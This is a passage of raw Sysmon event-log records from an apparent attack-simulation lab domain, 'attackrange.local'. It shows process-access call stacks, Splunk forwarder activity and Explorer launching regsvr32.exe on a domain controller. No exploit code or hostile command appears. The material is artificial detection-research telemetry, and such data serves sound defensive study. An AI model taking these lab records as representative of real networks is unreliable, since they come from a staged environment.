Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081408Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081407Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081406Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081405Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081404Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081403Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081402Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081401Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081400Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081399Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B24C-615A-4701-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081398Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B24C-615A-4701-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081397Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.609{2FDD8D40-B24C-615A-4701-00000000FD01}1064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000081396Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.015{2FDD8D40-B24B-615A-4601-00000000FD01}31283132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000103514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.344{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49523-false10.0.1.12-8000- 23542300x8000000000000000103513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:36.312{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5AAC630B913DDCE7A21AA8A617543CC5,SHA256=133B5FAE1202EF733F56434730ECBB8EF239853505EFF786CCF4021FED92451C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:36.312{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EE82C23D2C4A78015C1B819221F3250,SHA256=2BA01E49DA9929721B936180E35A1B7D9F9B2B38C5600166E5FC651F77AFA91D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103516Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:37.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850D71501095BB344AD4F15BBDC9ECD9,SHA256=D4DCD9A6C8D684787173073BCC39FE3FF4F31A96C533E5BA8C476D8277265434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081412Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:37.094{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F5BC0DFDF09F73733327D2F3FC6287D,SHA256=DE77F974BDD0A162AA3FF1DA05457ADFA625882FA5389F83A48AF9EB01E883E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103517Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:38.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8811DD926CBB87944630E112AF771DC5,SHA256=ABDFD34EE1AAEB31712D78D0313AC41C68D589B1EEDF250EF0CE462CB1E1225A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081413Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:38.109{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4238B0F9FFD8254A8BF640E4D8348691,SHA256=622F26ED6EB94989968F3819A593F12AB8471FF0A6D6121AE239BB6B8762327A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:39.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619A77A4732120F483169C0D3312BEE6,SHA256=19393A00445F9257BAB11239AB86D009F7547F1E9C8D244C4DFC28BBF756E7E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081415Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:37.598{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50024-false10.0.1.12-8000- 23542300x800000000000000081414Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:39.109{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A22A9C73DAF6BC550245DC15EB9FFC0,SHA256=08781C3F9D039512B029B69A42751FD6F8AEF8D6D3C8CE33A4BEC7F7BF5F3681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:40.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163E9974918192B032E9DA3029503DD9,SHA256=023173DD6A4B7F37A360B0B856110DF5886C2EE255C94622C6E98108F70B5DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081416Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:40.109{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86065E45425416BB9453F19623CA6314,SHA256=1B3C7E1C5D84AA8F740DC40E6AA407E356CFBA4272EF434B50449087904C6317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:41.546{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB797BB352CB301B37E1A92C90E2ECF,SHA256=5F6F9145F4118BC6517328AC907F7E23E11CA44633E69599EDB5C7C5F70A0013,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081417Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:41.109{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9893819F73D751DAAD83DA5A16E9970B,SHA256=BC43605CC8982CF018291A7D17BC4E6462B928674E7FF31FC1DD6D2C2030867D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:40.361{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49524-false10.0.1.12-8000- 23542300x8000000000000000103544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.593{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D88ABFBCC6ACAF269DBE5C93AEC81F0,SHA256=E1640785DBBAF14036FF8570308A22A7CE4A3BB09359ACC90AD1D15E23B246B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081418Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:42.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC979353BE73CDBF6A934906CFF9CDD8,SHA256=D179717E61472B007E8BE070B3F74B389B25E1BF302D883735030E20C59EC59B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.155{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103542Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.155{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103541Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.155{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103540Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.155{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103539Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 